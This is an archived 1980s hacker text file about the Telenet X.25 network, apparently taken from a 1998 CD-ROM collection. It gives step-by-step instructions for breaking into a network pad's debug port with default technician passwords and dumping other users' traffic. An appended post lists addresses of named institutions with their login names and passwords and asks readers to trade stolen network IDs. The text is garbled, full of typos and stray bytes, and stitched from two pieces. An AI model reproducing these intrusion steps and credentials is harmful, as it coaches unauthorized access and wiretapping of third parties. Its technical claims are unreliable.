home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / hacking / network / telenet.doc < prev    next >
Encoding:
Text File  |  2003-06-11  |  9.9 KB  |  314 lines
  1. Telenet The Secret Exposed...
  2.  
  3. For years, people and myself, have offtend tried to"work telenet unto acoma..
  4. With no success, for the pest few years, i have gathered data, and final
  5. know the system, its faults, capabilities, and errors.
  6. This really sxould be in a text, file, but. i wish this information, to
  7. be reserved for the few users on this system.
  8.  
  9. before i start. here are a few basic commands, to get famialir with:
  10.  
  11. Execution          syntax of command             function
  12. ------------------------------------------------------------------------
  13.  
  14. Connetc            c (sp)                        Connects to a host (opt)
  15.  
  16. Status             stat                          Displays network port add
  17.  
  18. Full-Duplex        full                          network echo
  19.  
  20. Half-Duplex        half                          Termnial echo
  21.  
  22. Mail
  23.   or
  24. Telemail           mail    telemail              telemail
  25.  
  26. set Parmaters      set (sp) 2:0,3:2              Select Pad Parameters
  27.  
  28. Read Paramaters    par?        par?(sp)2:0,3:2   display pad
  29.  
  30. Set and read
  31. Paramaters         set?(sp)2:0,3:2
  32.  
  33. escape             @                             escape from data modew
  34.  
  35. File Trasnfer      dtape                         Prepares network for bulk
  36.  
  37. continue           cont
  38.  
  39. disconnect         bye   or    d      
  40.  
  41. hang up            hangup
  42.  
  43. terminial          term(sp)d1                    Set TERM
  44.  
  45. test
  46.  
  47.                    test(sp)char
  48.  
  49.  
  50.                    test(sp)echo
  51.  
  52.  
  53.                    test(sp)triangle
  54.  
  55.  
  56. this is the end of the commands,   view next msg for useage:
  57.  
  58. Trap and pipe x.25 prot. (telenet)...
  59.  
  60. Pleasse note this is a very difficult transaction... The following
  61. flow chart, will only work on a machine with atleast 10 Mhz..
  62. However, an account on a unix, with cu capabilities will also work..
  63.  
  64. Package networking, is exactly what it means..
  65. before, i go into detail, let me give you and over view...
  66.  
  67.  
  68.  
  69. -------------
  70. Host
  71. -------------
  72.            !
  73.            !
  74.            !
  75.            !
  76.            -----------------
  77.               telenet, remote
  78.        $      divertor, and
  79.               pacakge.
  80.            ------------------
  81.                              !
  82.                              !
  83.                    ---------------------
  84.                    !      !    !       !
  85.                    !      !    !       !
  86.                    u      u    u       u
  87.                    s      s    s       s
  88.                    e      e    e       e
  89.                    r      r    r       r
  90.                    s      s    s       s
  91.  
  92. If you notice carefully, there is online to the host and 4 users.
  93. That is how its packaged, for instance the first 100 mills. will be
  94. from user on then two etc.. The way telenet can tell which is user
  95. is which, is simply by the time. Time is of the essense. data is
  96. constantly been packed, anywhere from 100 mils. to 760 mils.
  97. The trick to trap tapping and piping, a lead off of telenet, is to have
  98. as system running four proccewss and the same time, and have a master prgm.
  99. that switch's at the appropriate delays... As you can see this is
  100. where a 10 Mhz +  system, is needed.
  101.  
  102. On the host end.
  103.  
  104. The host end consists of three things..
  105.  
  106. 1)  9600 baud modem
  107.  
  108. 2)  a dedicated telcue line
  109.  
  110. 3)  a network pad..
  111.  
  112. I doubt know one needs a lesson on the first two, but lets take a look
  113. at telenets, "weakest" link..
  114.  
  115. Network Pad
  116. ----------
  117.  
  118. There are three types of network pads   a 4 pad 12 pad and 32 pad
  119. They really do not make a diffrence, it only changes the amount
  120. of users, capable of using on line..
  121.  
  122. example. if you have a 4 network pad.  you system will be able to handle
  123. four users from telenet   etc...
  124.  
  125. The network pad is Such a piece of"shit you have know idea..
  126.  
  127. All parameters are set remotly by a telenet eng..
  128.  
  129. This is important...
  130.  
  131. If the pad is every shutoff all parameters are lost.. and an eng. must
  132. reload the pad..  (again, this is done remotly)
  133.  
  134. to give you a small ifea, of$the amount of programing in thms pad
  135. (which i might add has over 2 megs of internal RAM)
  136. for an eng. to upload it ct 9600 bps..  it took approx 38 mins.
  137.  
  138. The Pad is not a computer,  if ytou think about it though, if your
  139. traveling at 1200 on telenet, your actually travling at 9600 and
  140. back to 1200.. when x.25 is unpacked..
  141.  
  142. How is the pad set remotly..
  143.  
  144. lets take an example...
  145.  
  146. c 2122
  147.  
  148. now c 2122  /(?this is an example)
  149.  
  150. ha four nodes its a siml divester to the next node. however you can
  151. specify, the node you want
  152.  
  153. c"212.01
  154. c 212.02
  155.    etc....
  156.  
  157. nodes can also"be stated as  2122a  is the same as "2122.01
  158. and 2122.03 is the same as 2122c
  159.  
  160. Now that we know how to access the indiv. nodes. let me show you a small
  161. secret...
  162.  
  163. Theres a programing node.. so an eng. can upload, to your network pad..
  164.  
  165. every address has it...
  166. it always ends in  99
  167.  
  168. so, if i wanted to trap and tap c 2122
  169.  
  170. i would enter   c 2122.99
  171.  
  172. you would get a connected.. but is you notice nothin happens..
  173.  
  174. at this point do not touch any keys.. a wrong key stroke, will
  175. most likely alert someone to your tampering..
  176. (dont forget, all network pads have a direct alarm signle.. so follow my 
  177. directions to the       t...
  178.  
  179. enter in :
  180.  
  181.                   @
  182.  
  183. with out a return..  you should  get    telenet
  184.                                         @
  185.  
  186. if you dont give it a min. then hit return. your actually there.
  187. but the prompt, just didnt print..
  188. ok..
  189.  
  190. Now type
  191.  
  192. set 15:0
  193.  
  194. when entered.. hold 15 secs.. for a time delay..
  195.  
  196. then type in     cont
  197.  
  198. to continue, with the host you brokg from.....
  199.  
  200. you will get a message:
  201.  
  202. TP3005 DEBUG PORT V5.37.03
  203. >
  204.  
  205.  
  206.  
  207. your now, directly accessed the network pad..
  208.  
  209.  
  210. Please note some of these have passwords:
  211.                                             However
  212. if your prompted for a password, of if nothing happens:
  213. telenet has two standard passwords:
  214.                                        superman
  215. represeting a male tech.
  216.          and
  217.                                    $  wonderwomen
  218. repre. a woman tech..
  219. when in your prompt  is$allways a greater than sign:
  220.                                                            >
  221.  
  222. type the following:
  223.  
  224.                         7FDS
  225. HIT RETURN
  226.  
  227.     youll get a responce:  $  E  01
  228.  
  229. NOW TYPE IN:
  230.                                   L7FE,L,A2,R2,D
  231.  
  232. then youll get a message:         R  00A626   8805
  233.  
  234. now enter ing:                    40588
  235.  
  236. YOUR RESPONCE WILL BE :           E   01
  237.  
  238. write now you should open atleast a 640K buffer.....
  239.  
  240. now type in >           R0589
  241.  
  242. YOULL GET A WHOLE LIST OF DATA THAT IS CURRENTLY CROSSING THE PADS
  243. DUPLX.
  244. ON LINE WILL LOOK LIKE THIS:
  245.  
  246.  
  247.  
  248. R 00A625   06805FF17068703  1287100230050540  0000000000000000  FF020101000000
  249.  
  250. ■"&]%%+f! !  )19AIQYai 
  251.  
  252.  
  253.  
  254.  It seems that not many of you know that Telenet is connected to about 80 
  255. computer-networks in the world. No, I don't mean 80 nodes, but 80 networks 
  256. with thousands of unprotected computers. When you call your local Telenet- 
  257. gateway, you can only call those computers which accept reverse-charging-calls. 
  258. If you want to call computers in foreign countries or computers in USA which 
  259. do not accept R-calls, you need a Telenet-ID. Did you ever notice that you can 
  260. type ID XXXX when being connected to Telenet? You are then asked for the 
  261. password. If you have such a NUI (Network-User-ID) you can call nearly every 
  262. host connected to any computer-network in the world. Here are some examples: 
  263. 026245400090184   is a VAX in Germany  (Username: DATEXP and leave mail for 
  264.                   CHRIS  !!!) 
  265. 0311050500061     is the Los Alamos Integrated computing network (One of the 
  266.                   hosts connected to it is the DNA (Defense Nuclear Agency)!!!) 
  267. 0530197000016     is a BBS in New Zealand 
  268. 024050256         is the S-E-Bank in Stockholm, Sweden   (Login as GAMES  !!!) 
  269. 02284681140541    CERN in Geneva in Switzerland (one of the biggest nuclear 
  270.                   research centers in the world) Login as GUEST 
  271. 0234212301161     A Videotex-standard system. Type OPTEL to get in and 
  272.                   use the ID 999_ with the password 9_ 
  273. 0242211000001     University of Oslo in Norway (Type  LOGIN 17,17  to play 
  274.                   the Multi-User-Dungeon !) 
  275. 0425130000215     Something like ITT Dialcom, but this one is in Israel ! 
  276.                   ID HELP  with password HELP  works fine with security level 3 
  277. 0310600584401     is the Washington Post News Service via Tymnet (Yes, Tymnet 
  278.                   is connected to Telenet, too !)  ID and Password is: PETER 
  279.                   You can read the news of the next day ! 
  280.  
  281. The prefixes are as follows: 
  282. 02624  is Datex-P in Germany 
  283. 02342  is PSS in England 
  284. 03110  is Telenet in USA 
  285. 03106  is Tymnet in USA 
  286. 02405  is Telepak in Sweden 
  287. 04251  is Isranet in Israel 
  288. 02080  is Transpac in France 
  289. 02284  is Telepac in Switzerland 
  290. 02724  is Eirpac in Ireland 
  291. 02704  is Luxpac in Luxembourg 
  292. 05252  is Telepac in Singapore 
  293. 04408  is Venus-P in Japan 
  294. ...and so on... Some of the countries have more than one packet-switching- 
  295. network (USA has 11, Canada has 3, etc). 
  296.  
  297. OK. That should be enough for the moment. As you see most of the passwords 
  298. are very simple. This is because they must not have any fear of hackers. Only 
  299. a few German hackers use these networks. Most of the computers are absolutely 
  300. easy to hack !!! 
  301. So, try to find out some Telenet-ID's and leave them here. If you need more 
  302. numbers, leave e-mail. 
  303. I'm calling from Germany via the German Datex-P network, which is similar to 
  304. Telenet. We have a lot of those NUI's for the German network, but none for 
  305. a special Tymnet-outdial-computer in USA, which connects me to any phone #. 
  306.  
  307. CUL8R,  Mad Max 
  308.  
  309. PS: Call 026245621040000 and type ID INF300 with password DATACOM to get more 
  310. Informations on packet-switching-networks !
  311.  
  312. PS2: The new password for the Washington Post is KING !!!!
  313.  
  314.